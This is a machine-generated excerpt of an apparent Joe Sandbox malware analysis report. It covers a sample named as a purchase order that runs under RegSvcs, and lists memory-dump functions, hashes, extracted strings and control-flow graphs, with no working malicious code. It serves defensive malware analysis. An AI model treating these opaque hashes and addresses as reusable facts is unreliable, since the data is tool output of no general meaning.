                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 341caf13e4d1d547eaa21729165e83dbaa468e6d4ded5bb88de634a73e0f0669
                                              • Instruction ID: 0d9e0128634c785cc524e126765d7ea93b9d865f821fa12b985fa4602b6dfb10
                                              • Opcode Fuzzy Hash: 341caf13e4d1d547eaa21729165e83dbaa468e6d4ded5bb88de634a73e0f0669
                                              • Instruction Fuzzy Hash: D3212971A14204DFDB25DF14D5D0B26BBA5FB88314F24C56DDC0A4B255C33ADC46CA61
                                              Function 0076D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f310ad87e7ddb094ca17eb9abb26d38c966c8fc9ad8b58e6e7002b3e7a68c7cb
                                              • Instruction ID: 7794fb554fdfacb7a7c7b725b3e422fb1100572b591d127dab5c88de1c724dc1
                                              • Opcode Fuzzy Hash: f310ad87e7ddb094ca17eb9abb26d38c966c8fc9ad8b58e6e7002b3e7a68c7cb
                                              • Instruction Fuzzy Hash: 1621FF75A14244DFCB24DF24D9C4B26BBA5EB88314F24C569EC0A4B296C33BDC47CAA1
                                              Function 0075D687 Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction ID: 610e98a23332fc67192ec279590c97a1c0f5751cf3c820da82c6e7436f956ec6
                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction Fuzzy Hash: AE21DF76404280DFCB26CF00D9C4B56BF72FB88314F24C6A9DD480B256C37AD82ACB92
                                              Function 0075D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction ID: 9b0f1ff4ce3f175505f0d2be4658ad3a454afd35a52d5dc1839250464886f02b
                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction Fuzzy Hash: 59110372404280CFDB26CF00D5C4B56BF72FB94324F24C2A9DC090B256C33AE85ACBA1
                                              Function 0076D017 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 52930759edd9f59b9daffee73e267655e78f633ff027e8da6bed3c13b900e0d4
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: A1118E75A04284DFDB15CF14D5C4B15BB61FB88314F24C6AADC4A4B656C33AD84ACB61
                                              Function 0076D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 798be138f075572fbc3aba77f5623e36c8488591eed332cc44608ee1ecdf8358
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 3A118E75A04240DFDB15CF14D5D4B15BB61FB84314F28C6A9DC4A4B656C33AD84ACB51
                                              Function 0075D7C5 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0113e98d08eb5f11679fdf6b255660ec79e121569870fad9bb63f65813c75d3
                                              • Instruction ID: 9269794641e00ea6f275cc3192bc927db5d3a93325e1f9c4f13e54a94e45e860
                                              • Opcode Fuzzy Hash: c0113e98d08eb5f11679fdf6b255660ec79e121569870fad9bb63f65813c75d3
                                              • Instruction Fuzzy Hash: AB01D031404344DAD7304F15CD84797BFD8EF45326F18C46AED095A156D6BDEC49C6B1
                                              Function 0075D7C4 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1708151d1b680d44e73d9406247e4a965bcf50aa94e47972f2ca10e1444054fd
                                              • Instruction ID: f9e314b8cb2bbf697dd080e813c45077d1e785c1a2d0e732350bb01f3b2d0ceb
                                              • Opcode Fuzzy Hash: 1708151d1b680d44e73d9406247e4a965bcf50aa94e47972f2ca10e1444054fd
                                              • Instruction Fuzzy Hash: 7CF06271404344AAE7208E1ADDC4BA2FFA8EF51725F18C45AED085B286D6B9AC44CAB1

                                              Non-executed Functions

                                              Function 05062548 Relevance: 9.0, Strings: 7, Instructions: 280COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !Y3E$Tekq$Tekq$$kq$$kq$$kq$$kq
                                              • API String ID: 0-3255284516
                                              • Opcode ID: 3a5c1253e567282a69f196de6d8e892d751fc4b88393e19146a44620ee210063
                                              • Instruction ID: 886b624adb258dfa7829583fca2ca1fea69877b054887082f01c48593a1e88fb
                                              • Opcode Fuzzy Hash: 3a5c1253e567282a69f196de6d8e892d751fc4b88393e19146a44620ee210063
                                              • Instruction Fuzzy Hash: B8A17238B002058FDB58DB79D964B6E7AE3BB88710F258429E506EB3A4DE74DC418B51
                                              Function 05062538 Relevance: 5.3, Strings: 4, Instructions: 281COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq$Tekq$$kq$$kq
                                              • API String ID: 0-3950962186
                                              • Opcode ID: 9f1e6b96036fb6c05861055f4e53ff7555f9a041978f8da76c69e48deabfa58f
                                              • Instruction ID: 0fa40257030d25f74f063981272a04797d159f7c72727159dc9005f42ce9941a
                                              • Opcode Fuzzy Hash: 9f1e6b96036fb6c05861055f4e53ff7555f9a041978f8da76c69e48deabfa58f
                                              • Instruction Fuzzy Hash: 4CA19038B10205CFDB54DB78D964B6E7BE3BB88750F258429E806EB3A4DE74DC418B50
                                              Function 050626DB Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $kq$$kq
                                              • API String ID: 0-3550614674
                                              • Opcode ID: 962ffedc0cc530b7306dd32370fe9b1d0afe525c8ee5fd916b62ea323ed1a98f
                                              • Instruction ID: 2cb3c20258bbb9084a91fe62fb7c1412084bbfe17cf851c74d2c98938c1b3a34
                                              • Opcode Fuzzy Hash: 962ffedc0cc530b7306dd32370fe9b1d0afe525c8ee5fd916b62ea323ed1a98f
                                              • Instruction Fuzzy Hash: AA517E38B01209DFDB149F74DA65B6E7AE3FB88700F248429E502EB7A4CA799D418B51
                                              Function 05066F78 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T(z
                                              • API String ID: 0-3184255237
                                              • Opcode ID: 0214c984cfae9cfc599807d84ca7c0bc2789ef5cfa9890ca15421a77ef69df35
                                              • Instruction ID: 77ac293e8a63c08a73c0bd1c11485ff3b27251b6aa89c76b08a881f390f31d81
                                              • Opcode Fuzzy Hash: 0214c984cfae9cfc599807d84ca7c0bc2789ef5cfa9890ca15421a77ef69df35
                                              • Instruction Fuzzy Hash: EC41F331F04205CBDB49CBB499526BFF7B7EBC8740F14842AD502AB294DA328D458BA2
                                              Function 05066F88 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T(z
                                              • API String ID: 0-3184255237
                                              • Opcode ID: cdb9677d14388cb26a7df636b2161f03677fc8faf20872c055b83246f0c5ea27
                                              • Instruction ID: 15b3f7c66106d637d66a9e14bcb515b0022b2ecab883ab2f627a6c73aad1fe32
                                              • Opcode Fuzzy Hash: cdb9677d14388cb26a7df636b2161f03677fc8faf20872c055b83246f0c5ea27
                                              • Instruction Fuzzy Hash: ED412931F04205CBDB48CBB9E9526BFF6B7EBC8740F10C42AD502EB294DA328D458791
                                              Function 050609F8 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ax^
                                              • API String ID: 0-994873808
                                              • Opcode ID: 141d54be19bce01341af39063d995f07cd53024938b3ee948f859806b71a7062
                                              • Instruction ID: 747770ff2b432116e5deca579aa0b3311a11fe7e97e4e89d1024e4c8f0eb0334
                                              • Opcode Fuzzy Hash: 141d54be19bce01341af39063d995f07cd53024938b3ee948f859806b71a7062
                                              • Instruction Fuzzy Hash: 4F41A235F9525A8FCB44CF99D8994AEFBF6FB88240F15816AD50AFB350C234DD018B91
                                              Function 050609E8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ax^
                                              • API String ID: 0-994873808
                                              • Opcode ID: 38e6360514777a58589980bc478f906c5d95daf3918672ac3aa2f64080037776
                                              • Instruction ID: 2d20eea3730614bcd9b7e554e640d1792dd2b5867963cd2120c6fea8fe8db000
                                              • Opcode Fuzzy Hash: 38e6360514777a58589980bc478f906c5d95daf3918672ac3aa2f64080037776
                                              • Instruction Fuzzy Hash: 1341B075FA525A8FCB44CF99D8994AEFBF2BB88340F15816AD50AFB350C234CD018B51
                                              Function 0506DEB8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37de05c6f8ba5bfe439699539e19c75493d8b8b1ee93cba72d59037a9d5fee85
                                              • Instruction ID: 61b933e92e9cbe14770df5e9a8431d50c37317700f3260c247627952891454f5
                                              • Opcode Fuzzy Hash: 37de05c6f8ba5bfe439699539e19c75493d8b8b1ee93cba72d59037a9d5fee85
                                              • Instruction Fuzzy Hash: 99E11974E042198FCB14DFA9D5809AEFBF2FF89304F249169E415AB35AD731A942CF60
                                              Function 0506FA50 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e38dac7b9ee3fa7442cfd349d98e0a8f5f1a4389c68ac4992b9afec6b65c6ff
                                              • Instruction ID: 7b2229aa79c0e11ba2bebb9be8b8ab16014728806cf0abc0dfd473a4e01722f9
                                              • Opcode Fuzzy Hash: 9e38dac7b9ee3fa7442cfd349d98e0a8f5f1a4389c68ac4992b9afec6b65c6ff
                                              • Instruction Fuzzy Hash: C7E1FB74E0411A8FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
                                              Function 0506DA80 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c3503bccfb9b14bc1e6741ba73ddd4dfd33ad3895da26779f6299598372305
                                              • Instruction ID: 44c714e27c273829091cc7b046d21e46790ece53dd7df3eff04da050da043f39
                                              • Opcode Fuzzy Hash: 67c3503bccfb9b14bc1e6741ba73ddd4dfd33ad3895da26779f6299598372305
                                              • Instruction Fuzzy Hash: F2E11974E002198FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
                                              Function 05066172 Relevance: .3, Instructions: 267COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e61be117062bcfca9d7915ec7b69ca7d77bd94b4c9843a776542d830bf89cd4f
                                              • Instruction ID: f69c7d4f64b5093c5bac2b0f0a68130dfb06c9ea8afa0818cc1afde65f4bdce9
                                              • Opcode Fuzzy Hash: e61be117062bcfca9d7915ec7b69ca7d77bd94b4c9843a776542d830bf89cd4f
                                              • Instruction Fuzzy Hash: A6D1F63192075ACACB11EFA4D990AD9F7B1FF95300F10979AD50977224EF70AAC9CB90
                                              Function 0084D5BC Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a758bf480db5568b1654d953d7963d34c990b6b4a371aa1914d2753744444f5
                                              • Instruction ID: f887f8c8b447163c2a8d710ceb419b73212b9a696d607bc8aab49f9a2859a0ce
                                              • Opcode Fuzzy Hash: 9a758bf480db5568b1654d953d7963d34c990b6b4a371aa1914d2753744444f5
                                              • Instruction Fuzzy Hash: 80A15B32E00209CFCF05DFA8D9405AEB7B2FF85300B15857AEA05EB266DB35E956CB40
                                              Function 05066178 Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 021b72ceee24625e06bf0ecda8dff1543dadd992be229c53ada1e815d09a4a9a
                                              • Instruction ID: 677996ff84360d47ca8f69092754d0f60a9aa6c801d8f13a420e00885a8263f3
                                              • Opcode Fuzzy Hash: 021b72ceee24625e06bf0ecda8dff1543dadd992be229c53ada1e815d09a4a9a
                                              • Instruction Fuzzy Hash: EED1F63192075ACACB11EFA4D950AD9F7B1FF95300F10979AE50977224EF70AAC9CB90
                                              Function 05066718 Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a920ecd7bcedea3c8c8c7fe9a9c4de3026807aebc7d32ad590ef88581731878a
                                              • Instruction ID: bbee18113ed28306a3c709ab284b21734af626e6f1b2b1b7a86fea9c35e69f81
                                              • Opcode Fuzzy Hash: a920ecd7bcedea3c8c8c7fe9a9c4de3026807aebc7d32ad590ef88581731878a
                                              • Instruction Fuzzy Hash: B1418735B04159DFCB04CFA8EA908AEFBB7EF88210F50456BE506EB254DA32DD51C782
                                              Function 05066728 Relevance: .1, Instructions: 113COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f87f27a6828e47b4afe50fc96be8a3c9b79233781053d1316f0c5c1ae38e990
                                              • Instruction ID: bc61ebb7e2e69f6e7b02b855c32175d1c11441bfe49dcce4a3dbd4ed7b404556
                                              • Opcode Fuzzy Hash: 5f87f27a6828e47b4afe50fc96be8a3c9b79233781053d1316f0c5c1ae38e990
                                              • Instruction Fuzzy Hash: C0417635B14159DFCB04CFA8E9808AEFBB7EF88310F50456AE506EB254DA32DD51CB82

                                              Execution Graph

                                              Execution Coverage:11.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 22395 69aea40 22396 69aea86 GlobalMemoryStatusEx 22395->22396 22397 69aeab6 22396->22397

                                              Executed Functions

                                              Function 01313E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: 826a8ff6bd7fa2e2e7bf5f2a9bceec55c16d2b9232a095cf0a88304ee9db6a93
                                              • Instruction ID: 37fdb33cabd6bb3ebc45ce4465ac0a28edb83a6004191348c784debee05548c5
                                              • Opcode Fuzzy Hash: 826a8ff6bd7fa2e2e7bf5f2a9bceec55c16d2b9232a095cf0a88304ee9db6a93
                                              • Instruction Fuzzy Hash: 39914D70E00209DFDF18CFA9C9957DEBBF2BF98318F148529E415A7258EB749885CB81
                                              Function 01314A98 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78c7becf16530104637898d580fcd763c493aa11e7ed4cabacfefa6942528a3a
                                              • Instruction ID: cdb014577b96321935f0b724c1d4fcbf62463ed33eec0544b94169b6a6142b01
                                              • Opcode Fuzzy Hash: 78c7becf16530104637898d580fcd763c493aa11e7ed4cabacfefa6942528a3a
                                              • Instruction Fuzzy Hash: 60B16F70E00209DFDF18CFA9C98179DBBF2BF88358F148529D855EB258EB749885CB81
                                              Function 01314810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1216 1314810-131489c 1219 13148e6-13148e8 1216->1219 1220 131489e-13148a9 1216->1220 1221 13148ea-1314902 1219->1221 1220->1219 1222 13148ab-13148b7 1220->1222 1229 1314904-131490f 1221->1229 1230 131494c-131494e 1221->1230 1223 13148b9-13148c3 1222->1223 1224 13148da-13148e4 1222->1224 1225 13148c5 1223->1225 1226 13148c7-13148d6 1223->1226 1224->1221 1225->1226 1226->1226 1228 13148d8 1226->1228 1228->1224 1229->1230 1232 1314911-131491d 1229->1232 1231 1314950-13149a9 1230->1231 1241 13149b2-13149d2 1231->1241 1242 13149ab-13149b1 1231->1242 1233 1314940-131494a 1232->1233 1234 131491f-1314929 1232->1234 1233->1231 1236 131492b 1234->1236 1237 131492d-131493c 1234->1237 1236->1237 1237->1237 1238 131493e 1237->1238 1238->1233 1246 13149dc-1314a0f 1241->1246 1242->1241 1249 1314a11-1314a15 1246->1249 1250 1314a1f-1314a23 1246->1250 1249->1250 1251 1314a17-1314a1a call 1310ab8 1249->1251 1252 1314a33-1314a37 1250->1252 1253 1314a25-1314a29 1250->1253 1251->1250 1256 1314a47-1314a4b 1252->1256 1257 1314a39-1314a3d 1252->1257 1253->1252 1255 1314a2b-1314a2e call 1310ab8 1253->1255 1255->1252 1258 1314a5b 1256->1258 1259 1314a4d-1314a51 1256->1259 1257->1256 1261 1314a3f 1257->1261 1263 1314a5c 1258->1263 1259->1258 1262 1314a53 1259->1262 1261->1256 1262->1258 1263->1263
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 0067da0a5c73e3cea4e888857ae0b8982d03da6a762caf984d9e49fb79b45c97
                                              • Instruction ID: aec268ed735ac1c9edb3916557a8baf28c059d13a6a8cce302acc3303a941fc6
                                              • Opcode Fuzzy Hash: 0067da0a5c73e3cea4e888857ae0b8982d03da6a762caf984d9e49fb79b45c97
                                              • Instruction Fuzzy Hash: FD716EB1E00249CFDB18DFA9C98079EBFF2AF88318F148129E415A7258EB749845CB95
                                              Function 01314804 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1167 1314804-131489c 1171 13148e6-13148e8 1167->1171 1172 131489e-13148a9 1167->1172 1173 13148ea-1314902 1171->1173 1172->1171 1174 13148ab-13148b7 1172->1174 1181 1314904-131490f 1173->1181 1182 131494c-131494e 1173->1182 1175 13148b9-13148c3 1174->1175 1176 13148da-13148e4 1174->1176 1177 13148c5 1175->1177 1178 13148c7-13148d6 1175->1178 1176->1173 1177->1178 1178->1178 1180 13148d8 1178->1180 1180->1176 1181->1182 1184 1314911-131491d 1181->1184 1183 1314950-13149a9 1182->1183 1193 13149b2-13149c0 1183->1193 1194 13149ab-13149b1 1183->1194 1185 1314940-131494a 1184->1185 1186 131491f-1314929 1184->1186 1185->1183 1188 131492b 1186->1188 1189 131492d-131493c 1186->1189 1188->1189 1189->1189 1190 131493e 1189->1190 1190->1185 1197 13149c8-13149d2 1193->1197 1194->1193 1198 13149dc-1314a0f 1197->1198 1201 1314a11-1314a15 1198->1201 1202 1314a1f-1314a23 1198->1202 1201->1202 1203 1314a17-1314a1a call 1310ab8 1201->1203 1204 1314a33-1314a37 1202->1204 1205 1314a25-1314a29 1202->1205 1203->1202 1208 1314a47-1314a4b 1204->1208 1209 1314a39-1314a3d 1204->1209 1205->1204 1207 1314a2b-1314a2e call 1310ab8 1205->1207 1207->1204 1210 1314a5b 1208->1210 1211 1314a4d-1314a51 1208->1211 1209->1208 1213 1314a3f 1209->1213 1215 1314a5c 1210->1215 1211->1210 1214 1314a53 1211->1214 1213->1208 1214->1210 1215->1215
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 59f9647a81482fcee969e1da65ce266cbafded10e0bc3a59f11a33ba3a6c16cf
                                              • Instruction ID: 224ad11ce282d789133872679b46cb7cf0948c312efcbb6fd4ae43967d7b93df
                                              • Opcode Fuzzy Hash: 59f9647a81482fcee969e1da65ce266cbafded10e0bc3a59f11a33ba3a6c16cf
                                              • Instruction Fuzzy Hash: 32716DB1D00249CFDB14DFA9D9847DEBFF2AF48318F148129E814A7258EB749845CF95
                                              Function 069AE6D0 Relevance: 2.0, APIs: 1, Instructions: 491COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1379 69ae6d0-69aea7e 1381 69aea86-69aeab4 GlobalMemoryStatusEx 1379->1381 1382 69aeabd-69aeae5 1381->1382 1383 69aeab6-69aeabc 1381->1383 1383->1382
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 069AEAA7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1788465510.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_69a0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 5cf6cf1dd80c776cd285efe33e88727a0b59e9809983c3d5c3a32d48e7559900
                                              • Instruction ID: af8f6990bbd25137ea09e315890761e5cbb712798a404bfcdc52e4f1a3c7e3e0
                                              • Opcode Fuzzy Hash: 5cf6cf1dd80c776cd285efe33e88727a0b59e9809983c3d5c3a32d48e7559900
